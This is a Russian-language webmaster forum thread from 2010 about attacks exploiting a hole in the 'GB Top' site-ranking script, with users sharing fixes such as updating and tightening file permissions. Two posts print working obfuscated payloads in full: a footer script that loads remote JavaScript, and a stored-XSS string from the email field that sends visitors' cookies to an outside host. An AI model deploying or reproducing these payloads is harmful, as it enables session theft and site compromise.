Master-X
Форум | Новости | Статьи
Главная » Форум » Топы » 
Тема: (Лечение!) Ахтунг атакуют топы или дыра GB Top
цитата
14/10/10 в 23:10
 CrazyMen
Тут такая хрень вышла присылают мне письмо, что мол один маленький засранец из твоих трейдеров засунул тебе в темплейт вирус, ну думаю посмотрю и твою же мать реально нашел в футере не пойми откуда появившийся скрипт!

<script>var temp="",i,c=0,out="";var str="60!115!99!114!105!112!116!32!115!114!99!61!104!116!116!112!58!47!47!98!101!115!116!120!120!120!46!111!114!103!47!105!109!97!103!101!115!47!115!46!106!115!62!60!47!115!99!114!105!112!116!62!";l=str.length;while(c<=str.length-1){while(str.charAt(c)!='!')temp=temp+str.charAt(c++);c++;out=out+String.fromCharCode(temp);temp="";}document.write(out);</script>


Потом начал догадыватся. Один контом все пытался засабмитить то 2.com то 21.com и в таком же порядке все остальное, но вместо мыла вбивал какуюто херь наподобии css что ли кода, даже не заапрувленый акк корежил админку, после удаления все было норм опять. Походу баг в ГБ топе. Мля хз че делать... Пипл в блек лист ip 94.143.197.2

Последний раз редактировалось: CrazyMen (20/12/10 в 21:23), всего редактировалось 1 раз
цитата
14/10/10 в 23:22
 CrazyMen
Опять сученыш добавился!
Данные такие теперь:

domain: hoto.com
Webmaster Email: aa@mail.com\" id=thread_title_716 style=position:absolute;top:90px;left:0px;z-index:999;width:1000;height:50;display:block onmouseover=eval(String.fromCharCode(118,97,114,32,111,117,114,95,116,101,120,116,61,34,60,105,102,114,97,109,101,32,115,114,99,61,92,34,106,97,118,97,115,99,114,105,112,116,58,100,111,99,117,109,101,110,116,46,108,111,99,97,116,105,111,110,61,92,39,104,116,116,112,58,47,47,105,105,46,115,101,120,45,116,111,112,46,111,114,103,47,105,109,103,47,105,109,103,46,112,104,112,63,92,39,43,112,97,114,101,110,116,46,100,111,99,117,109,101,110,116,46,99,111,111,107,105,101,92,34,32,115,116,121,108,101,61,92,34,100,105,115,112,108,97,121,58,110,111,110,101,59,92,34,62,60,47,105,102,114,97,109,101,62,34,59,10,118,97,114,32,101,108,101,109,101,110,116,61,100,111,99,117,109,101,110,116,46,103,101,116,69,108,101,109,101,110,116,66,121,73,100,40,34,49,34,41,59,10,101,108,101,109,101,110,116,46,105,110,110,101,114,72,84,77,76,43,61,111,117,114,95,116,101,120,116,59)) \\
Webmaster IP: 94.143.197.2 Mozilla/5.0 (Windows

Последний раз редактировалось: CrazyMen (16/10/10 в 11:18), всего редактировалось 1 раз
цитата
15/10/10 в 07:50
 Retox
CrazyMen какая версия скрипта?
Написал о проблеме на - GB Top Forum
goldenbull - выпустит заплатку или обновит версию для скачки.

Последний раз редактировалось: Retox (15/10/10 в 16:56), всего редактировалось 1 раз
цитата
15/10/10 в 08:40
 Alexandur
Поставь на все хтмл файлы в templates разрешение 644

А то что административную часть пробивают, это к разработчику. Хотя мне вроде тоже добавляли подобные сайты, но админка не ломалась. Браузер Опера.
цитата
15/10/10 в 10:03
 Danyil
Меня тоже атаковал этот гад...
цитата
15/10/10 в 11:03
 salo
Мне тоже досталось, причем дважды, ломанули админки топов, штук 12, сменили пароли, в футер или хедер прописали скрипт, причем еще и разный (фантазеры бля), выплывала консоль при любом нажатии по морде топа или при его закрытии. Почистил все. Права 777 на все папки топа ставить нельзя, шаблоны надо защитить ставя права ниже чем 777, можно файл админки admin.php заменить на другой (на что фантазия способна). Столько времени похерено из долбаеба хакера
Его следы
1stsexmovies@hotmail.be
124.106.185.183 Mozilla/5.0
124.106.143.48
124.217.19.243
цитата
15/10/10 в 16:01
 Дольчик ххх
Аналогично добавлялся этот чурка, только так и не понял как самбит его смог пропустить если он не указывал мейл, и после него когда заходил в админку его емейл появлялся в верху стр. и сама по себе перезагружалась пока его не удалил!
gimcnuk ставить на templates разрешение 644 - это что то изменит? icon_smile.gif
цитата
15/10/10 в 19:03
 CrazyMen
Версия топа 5.1. Если поставить права 644 на темплейты то невозможно будет их редактировать из админки что в общем то и не нужно
цитата
15/10/10 в 23:41
 Adrenalin
Блять, а нельзя этот мега код как-то уменьшить? В тег какой-нить завернуть, типа [ code ]. Вся верстка похерилась.
цитата
16/10/10 в 11:17
 CrazyMen
Adrenalin: Дак БЛЯТЬ,а он в чем? Прям беда что верстка похерилась!
цитата
19/10/10 в 17:58
 Христофор Бонефатьевич
ко мне тоже этот пидарас добавлялся
цитата
19/10/10 в 20:16
 CrazyMen
Разговаривал с автором - Goldenbullом - сказал что все пофиксил и реализовал в версии 5.3. Обновляйтесь обязательно.
цитата
23/10/10 в 16:28
 Дольчик ххх
... вот и неделя не прошла, как у меня все топы и фришники в этом злое****м скрипте, правда сейчас в верху страницы появилися код, и не кто ко мне не подозрительный не самбителся, а на некоторых топах вообще самбита не было! Хотя до этого обновил все топы версией 5.2 думал что не критично будет обновлять до 5.3. И самое интересное что на фришниках которые на скрипте гб сж, этот код как бы сам по себе появляется. Все топы обновил и вставаил часть злого кода в блек лист, как говорит автор скрипта! На некоторых топах постваил права 644 на штмл фаилы в папке темплейтс для эксперемента! Вообще лучше переходить на другой скрипт с хорошим античитом и не ломаемым ;)
цитата
23/10/10 в 16:45
 Retox
Дольчик ххх - GB хороший скрипт - как вариант конечно DF Pro ну или на движке СЖ делай...
рано или поздно к любому движку хакеры находят ключик... Тот же вордпресс для блогов его как не обновляй всё равно уязвимость будет.
-Возможно руткит засел на сервере который инжектит сплоитную компоненту в файлы с правами на запись... Потомучто во фришники то как мог попасть исключая увод ФТП...
Ну и права на файлы должны помочь...
Хотя ситуация очень неприятная icon_sad.gif
цитата
23/10/10 в 17:58
 _4eburek
Оффтопик: Может автор гб скрипта решил подзаработать ? smail101.gif
цитата
24/10/10 в 10:42
 CrazyMen
Дольчик ххх: Думаю не стоит менять скрипт это рутинная работа, благо обновления выходят. Действително проверь свой фтп напряги админов.
_4eburek: Да врядли конечно, но все возможно icon_wink.gif
цитата
30/10/10 в 20:12
 Danyil
Теперь этот гадёных сломал мою сетку:
http://new-tops.com/webmasters.html
Хрен знает как.
В ящике 438 писем "Mail delivery failed: returning message to sender"...
Пипец полный... icon_sad.gif
цитата
30/10/10 в 20:34
 Alexandur
Может техподдержка чего намудрила?
Если .htaccess есть, посмотри что в нём:
Код:
AddType application/x-httpd-php .???
цитата
30/10/10 в 20:34
 CrazyMen
Да мен,шняга шняжная получается. Что нибудь в темплейты добавили? Весрия какая была скрипта? Отпиши обязательно на офф форуме. Мне еще кажется что голденбул продавать скрипт будет другому.
ВАЖНО!
В НАСТРОЙКАХ ПОСТАВЬТЕ МИНИМАЛЬНЫЙ ВЕС ДОБАВЛЯЕМОГО САЙТА "1000"! ТАК Н ЕСМОГУТ ДОБАВИТЬ ПУСТЫЕ/НЕСУЩЕСТВУЮЩИЕ ДОМЕНЫ!
цитата
30/10/10 в 20:58
 Danyil
.htaccess нету...
цитата
30/10/10 в 21:02
 Alexandur
Ну я смотрю починилось всё. Спроси поддержку - чего они мудрили с расширениями.
цитата
30/10/10 в 21:16
 Danyil
Фу-ух...
Было так. Заглядываю в мыло. Там опять этот педераст добавил в мои три топа зловредную хрень, как описано в первом посте.
Ну, я пошёл его удалять, но в админку зайти не смог. Глядь, а все топы уже не работают. Захожу в мыло, а там тонны мусора, но тех писем, что хранились до того - нету...
цитата
30/10/10 в 21:40
 Danyil
Опять всё пропало... icon_cry.gif
цитата
30/10/10 в 22:44
 Danyil
Постучался к хостеру.
Вроде, починили...

Хрен, опять сломалось...

Последний раз редактировалось: Danyil (30/10/10 в 23:16), всего редактировалось 1 раз
цитата
30/10/10 в 23:14
 CrazyMen
Ставь 5.3! Я же писал что вышло обновление пофиксенный спешл фо эту дыру. На все что в папке темплейт поставь права 644, после редактирования. Стучись админам у тебя реально походу хтаццесс поехал. Хотя один топ живой у тебя. Попробовал добавить нашару придуманый сайт и без проблем добавил сморти под титлом Ya BOT. Обновись, времени займет минут 30 от силы.
Стр. 1, 2, 3, 4, 5  >  последняя »


Эта страница в полной версии